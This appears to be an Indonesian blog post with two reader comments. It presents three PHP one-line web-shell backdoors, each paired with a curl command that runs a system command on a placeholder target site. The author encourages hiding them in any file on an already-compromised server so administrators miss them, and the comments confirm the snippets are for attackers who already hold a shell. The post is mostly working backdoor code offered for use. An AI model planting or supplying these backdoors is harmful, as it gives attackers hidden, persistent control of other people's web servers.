Langsung yuk simak gimana caranya stepnya, Dan kalian cukup copy source code dibawah:
*Code : <?=extract($_COOKIE);@$F($C);?> *Access : curl -b "F=system;C=uname -a" http://target-website.com/namafile.php
*Code : <?php assert_options(ASSERT_WARNING, 0); assert(eval(getenv('HTTP_CODE')));?> *Access : curl -H "Code: system('uname -a');" http://target-website.com/namafile.php
*Code : <?php eval('?>' . file_get_contents('php://input')); *Access : curl -d "<?=system('uname -a');" http://target-website.com/namafile.php
Nb: Trick diatas bisa kalian pakai dan taruh di file mana saja. Kecuali adminnya kelewat pro sampe jeli sangat memperhatikan source codenya satu-satu hehe. Oiya cara ini ga berfungsi jika ada disable functionnya berlapis loh ya kayak exec,shell_exec,dsb.
Gimana? Cukup mudah dan gampang bukan jadi anti tikung deh hehe, Oke mungkin cukup sekian, Semoga bermanfaat and dont forget to share and see you next time byee~
Maksudnya bagaimana mas, kita harus tembus dulu adminya ? Hbistuh baru kita tanam script.php di atas ?begitu...
ReplyDeleteYups posisinya sudah harus di shell / backdoor
ReplyDelete